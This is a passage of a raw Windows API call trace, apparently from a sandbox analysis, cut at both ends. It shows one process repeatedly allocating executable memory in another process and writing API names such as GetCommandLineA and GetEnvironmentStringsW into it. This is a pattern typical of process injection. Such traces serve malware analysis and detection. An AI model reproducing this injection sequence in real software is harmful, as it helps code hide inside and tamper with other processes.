lpBuffer=0x32b3d82a*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d82a*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0184.636] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.637] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e851d0 [0184.637] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.637] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e851d0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e851d0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.637] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.638] ResetEvent (hEvent=0x794) returned 1 [0184.638] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.638] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.638] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.638] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e851d0 | out: hHeap=0x2150000) returned 1 [0184.638] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.638] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.638] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.639] lstrlenA (lpString="IsValidLocale") returned 13 [0184.639] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.639] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d838*, nSize=0xe, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d838*, lpNumberOfBytesWritten=0xcd978*=0xe) returned 1 [0184.639] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.639] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84bd0 [0184.639] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.640] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84bd0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84bd0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.640] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.640] ResetEvent (hEvent=0x794) returned 1 [0184.640] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.641] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.641] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.641] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84bd0 | out: hHeap=0x2150000) returned 1 [0184.641] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.641] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.641] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.641] lstrlenA (lpString="GetUserDefaultLCID") returned 18 [0184.642] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.642] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d848*, nSize=0x13, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d848*, lpNumberOfBytesWritten=0xcd978*=0x13) returned 1 [0184.642] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.642] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84ea0 [0184.642] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.642] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84ea0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84ea0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.643] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.643] ResetEvent (hEvent=0x794) returned 1 [0184.643] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.644] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.644] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.644] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84ea0 | out: hHeap=0x2150000) returned 1 [0184.644] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.644] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.644] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.644] lstrlenA (lpString="EnumSystemLocalesW") returned 18 [0184.644] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.645] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d85e*, nSize=0x13, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d85e*, lpNumberOfBytesWritten=0xcd978*=0x13) returned 1 [0184.645] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.645] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84ab0 [0184.645] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.645] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84ab0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84ab0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.646] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.650] ResetEvent (hEvent=0x794) returned 1 [0184.650] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.651] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.651] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.652] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84ab0 | out: hHeap=0x2150000) returned 1 [0184.652] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.653] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.654] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.654] lstrlenA (lpString="FindClose") returned 9 [0184.654] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.655] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d874*, nSize=0xa, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d874*, lpNumberOfBytesWritten=0xcd978*=0xa) returned 1 [0184.656] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.656] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85140 [0184.656] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.656] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e85140*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e85140*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0185.726] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0185.726] ResetEvent (hEvent=0x794) returned 1 [0185.726] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0185.726] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0185.727] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.727] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85140 | out: hHeap=0x2150000) returned 1 [0185.727] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.727] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0185.727] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0185.727] lstrlenA (lpString="FindFirstFileExA") returned 16 [0185.728] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0185.728] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d880*, nSize=0x11, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d880*, lpNumberOfBytesWritten=0xcd978*=0x11) returned 1 [0185.729] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0185.729] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84f00 [0185.729] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0185.729] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84f00*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84f00*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0185.730] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0185.730] ResetEvent (hEvent=0x794) returned 1 [0185.730] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0185.730] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0185.730] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.731] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84f00 | out: hHeap=0x2150000) returned 1 [0185.731] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.731] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0185.731] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0185.731] lstrlenA (lpString="FindNextFileA") returned 13 [0185.731] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0185.731] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d894*, nSize=0xe, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d894*, lpNumberOfBytesWritten=0xcd978*=0xe) returned 1 [0185.732] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0185.732] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85050 [0185.732] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0185.732] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e85050*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e85050*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0185.733] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0185.733] ResetEvent (hEvent=0x794) returned 1 [0185.733] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0185.733] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0185.733] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.734] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85050 | out: hHeap=0x2150000) returned 1 [0185.734] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.734] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0185.734] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0185.734] lstrlenA (lpString="IsValidCodePage") returned 15 [0185.734] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0185.734] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d8a4*, nSize=0x10, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d8a4*, lpNumberOfBytesWritten=0xcd978*=0x10) returned 1 [0185.735] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0185.735] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84f30 [0185.735] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0185.735] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84f30*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84f30*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0185.735] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0185.736] ResetEvent (hEvent=0x794) returned 1 [0185.736] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0185.736] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0185.736] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.736] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84f30 | out: hHeap=0x2150000) returned 1 [0185.736] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.737] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0185.737] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0185.737] lstrlenA (lpString="GetOEMCP") returned 8 [0185.737] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0185.737] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d8b6*, nSize=0x9, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d8b6*, lpNumberOfBytesWritten=0xcd978*=0x9) returned 1 [0185.738] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0185.738] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84780 [0185.738] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0185.738] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84780*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84780*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0185.738] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0185.739] ResetEvent (hEvent=0x794) returned 1 [0185.739] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0185.739] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0185.739] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.739] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84780 | out: hHeap=0x2150000) returned 1 [0185.739] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.739] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0185.740] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0185.740] lstrlenA (lpString="GetCommandLineA") returned 15 [0185.740] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0185.740] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d8c2*, nSize=0x10, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d8c2*, lpNumberOfBytesWritten=0xcd978*=0x10) returned 1 [0185.740] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0185.740] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85140 [0185.740] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0185.741] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e85140*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e85140*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0185.741] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0185.741] ResetEvent (hEvent=0x794) returned 1 [0185.741] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0185.742] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0185.742] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.742] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85140 | out: hHeap=0x2150000) returned 1 [0185.742] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.742] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0185.743] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0185.743] lstrlenA (lpString="GetCommandLineW") returned 15 [0185.743] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0185.743] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d8d4*, nSize=0x10, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d8d4*, lpNumberOfBytesWritten=0xcd978*=0x10) returned 1 [0185.743] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0185.743] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84ab0 [0185.743] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0185.744] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84ab0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84ab0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0185.744] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0185.744] ResetEvent (hEvent=0x794) returned 1 [0185.744] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0186.003] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0186.003] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.003] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84ab0 | out: hHeap=0x2150000) returned 1 [0186.003] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.004] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0186.004] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0186.004] lstrlenA (lpString="GetEnvironmentStringsW") returned 22 [0186.004] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0186.004] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d8e6*, nSize=0x17, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d8e6*, lpNumberOfBytesWritten=0xcd978*=0x17) returned 1 [0186.005] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0186.005] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84f30 [0186.005] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0186.005] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84f30*, nSize=0x20, 